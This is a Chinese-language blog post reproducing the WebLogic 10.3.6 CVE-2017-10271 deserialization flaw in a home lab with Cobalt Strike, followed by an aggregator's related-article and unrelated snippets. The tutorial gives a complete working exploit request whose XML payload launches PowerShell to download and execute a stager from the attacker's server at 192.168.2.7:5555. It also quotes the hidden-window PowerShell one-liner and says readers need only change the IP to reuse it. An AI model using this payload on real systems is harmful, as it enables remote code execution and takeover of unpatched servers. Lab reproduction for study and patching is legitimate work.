今天小R又学会了一个工具的使用,而且这个工具很强大很强大。 待会介绍。

一、需要的试验环境:

一台宿主机,虚拟机(kali+window2008或其他版本的windows)  
1.宿主机需要的工具:BT(burpsuite)

2.虚拟机kali:CobaltStrike 工具(我用的是3.8版本),由于这个工具容易被百度云和谐我就步发百度云链接了。可以找我要:QQ1356187559

3.windows server2008  :搭建一个weblogic环境(这里就不介绍搭建了,网上有)

二、实验说明

此实验不仅仅局限于内网,外网也可以,但是外网必须得要有一个服务器。否则是不可以实现的。由于没有购买服务器,所以用内网测。把宿主机当做攻击机,kali作为攻击者的服务器, window server2008则为靶机。
在这里:

攻击机IP:192.168.2.5

服务器kali IP:192.168.2.7

靶机windwos server 2008 IP :192.168.2.11

三、操作步骤。

1. 用攻击机IP访问靶机的weblogic看看weblogic是否能够正常运行。

2. 能够正常运行之后,就开始用kali里面的工具了。解压后进入然后在终端里打开

3.运行打开teamserver发现提示以下信息,得输入 本机的host(不是127.0.0.1,是192.168.2.7),密码随意设(要记住)。  PS: 这里得讲一下,小R在第一次运行这个teamserver这个程序的时候,出现权限不够这一句话,若有

有雷同的情况,可以用这条   chomd a+x ./teamserver   命令来修改权限,sudo是不可以的。

4.运行后,这个终端不要关闭,打开另外一个终端,运行  ./cobaltstrike 除了填入密码以外,其它的可以不用变,端口随便。这里选择默认

5. 点击如图所示的按钮,URL Path 随便你写,端口也随便。然后点击Launch。  复制这段代码。

6. 打开宿主机的Burpsuite。抓取该 网址的包 http://192.168.2.11:7001/wls-wsat/CoordinatorPortType后,利用Burpsuite来修改包发出去。 这里注意得是POST请求,默认的是get,得改过来,除此之外,还得添加Content-Type: text/xml  这句话。

POC发给你们。

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.2.11:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: SL_G_WPT_TO=zh; SL_GWPT_Show_Hide_tmp=1; SL_wptGlobTipTmp=1
Connection: close
Content-Length: 1130

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="4">
<void index="0">
<string>powershell.exe</string>
</void>
<void index="1">
<string>IEX</string>
</void>
<void index="2">
<string>((new-object</string>
</void>
<void index="3">
<string>net.webclient).downloadstring('http://192.168.2.7:5555/R'))</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

好了好了,现在来分析一下这段代码。有没有发现前面利用     powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.2.7:5555/R.Hacker'))"

在这里我是分开写的,因为weblogic不能识别空格,所以就利用这个分段的模式来解决。  至于 -nop  -w  hidden -c 为啥没有我就不解释了,反正没用。

各位做的时候主要也就是改下ip就行了。

7.  发出去以后,在windows 2008 server 中打开任务管理器。你就会在发现一个powershell的漏洞

8.注入代码成功,再回头看看 kali里面的工具吧。打开监听功能。根据如图情况填写。

9.然后看如图,成功上线。  上线了以后能干什么吗???   你跟我讲能干什么???   他什么都能干,这里就不介绍,网上有教程。 小R有点累。 不懂就加QQ问我吧

关于weblogic 10.3.6.0 的漏洞复现(2)的更多相关文章

  1. 关于weblogic 10.3.6.0 的漏洞复现(1)

    最近小R 搭建了个weblogic,  因为之前在公司找系统漏洞的时候,发现了这个漏洞,所以为了特地专门搭建了个10.3.6.0版本. 漏洞编号: CVE-2017-10271 漏洞的描述:就是web ...

  2. Weblogic CVE-2018-3191远程代码命令执行漏洞复现

      0x00 简介 北京时间10月17日,Oracle官方发布的10月关键补充更新CPU(重要补丁更新)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191).该漏洞允许未经 ...

  3. 10.Redis未授权访问漏洞复现与利用

    一.漏洞简介以及危害: 1.什么是redis未授权访问漏洞: Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等 ...

  4. Weblogic 10.3.6.0 集群搭建

    Weblogic 集群搭建 Oracle的Weblogic分开发者版本和生产版本,有32位和64位.一般生产版本的weblogic是64位的,安装文件是一个大小为1G多的jar包.去oracle官网上 ...

  5. Weblogic 'wls-wsat' XMLDecoder 反序列化_CVE-2017-10271漏洞复现

    Weblogic 'wls-wsat' XMLDecoder 反序列化_CVE-2017-10271漏洞复现 一.漏洞概述  WebLogic的 WLS Security组件对外提供webservic ...

  6. Weblogic wls9_async_response 反序列化远程命令执行漏洞(CVE-2019-2725)复现

    一.     漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8. CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为 ...

  7. Linux下命令行安装WebLogic 10.3.6

    1.创建用户useradd weblogic;创建用户成功linux系统会自动创建一个和用户名相同的分组,并将该用户分到改组中.并会在/home路径下创建一个和用户名相同的路径,比如我们创建的webl ...

  8. Weblogic-SSRF漏洞复现

    Weblogic-SSRF漏洞复现 一.SSRF概念 服务端请求伪造(Server-Side Request Forgery),是一种有攻击者构造形成有服务端发起请求的一个安全漏洞.一般情况下,SSR ...

  9. WEBLOGIC 11G (10.3.6) windows PSU 升级10.3.6.0.171017(Java 反序列化漏洞升级)

    10.3.6版本的weblogic需要补丁到10.3.6.0.171017(2017年10月份的补丁,Java 反序列化漏洞升级),oracle官方建议至少打上2017年10月份补丁. 一.查看版本 ...

随机推荐

  1. LeetCode:判断最长前缀

    之前一直忽略了一个问题就是:给定的空字符串数组 char* longestCommonPrefix(char** strs, int strsSize) { char* result; if(strs ...

  2. 07 http内容压缩

    一:http内容压缩 思考: Content-Length在之前的学习中,我们知道,代表返回的主体的长度 但此处,为什么返回的主体长度和content-length不一致呢? 原因在于: Conten ...

  3. C# WPF DataGrid控件实现三级联动

    利用DataGrid控件实现联动的功能,在数据库客户软件中是随处可见的,然而网上的资料却是少之又少,令人崩溃. 本篇博文将介绍利用DataGrid控件模板定义的三个ComboBox实现“省.市.区”的 ...

  4. LeetCode(88)题解-- Merge Sorted Array

    https://leetcode.com/problems/merge-sorted-array/ 题目: Given two sorted integer arrays nums1 and nums ...

  5. 【BZOJ1414/3705】[ZJOI2009]对称的正方形 二分+hash

    [BZOJ1414/3705][ZJOI2009]对称的正方形 Description Orez很喜欢搜集一些神秘的数据,并经常把它们排成一个矩阵进行研究.最近,Orez又得到了一些数据,并已经把它们 ...

  6. ubuntu 12.04 解压安装jdk

    ubuntu下解压安装jdk,简单方便.分享一下安装方法: 注:该方法针对新系统,之前没有配置过jdk的情况. 1.下载相应版本号的jdk压缩包.如 jdk-8u5-linux-x64.gz 2.解压 ...

  7. java URI 编码解码

    import java.io.UnsupportedEncodingException; /** * url转码.解码 */ public class UrlUtil { private final ...

  8. Python pip源,解决安装慢的问题

    经常在使用Python的时候需要安装各种模块,而pip是很强大的模块安装工具,但是由于国外官方pypi经常被墙,导致不可用,所以我们最好是将自己使用的pip源更换一下,这样就能解决被墙导致的装不上库的 ...

  9. HTML CSS 属性大全

    CSS 属性大全 文字属性 「字体族科」(font-family),设定时,需考虑浏览器中有无该字体. 「字体大小」(font-size),注意度量单位.<绝对大小>|<相对大小&g ...

  10. runtime之实现对象序列化

    /* iOS序列化,将对象转成二进制,保存到本地 */ 定义一个对象,让它实现NSCoding协议,保证对象的编码和解码,person有三个属性 @interface Person : NSObjec ...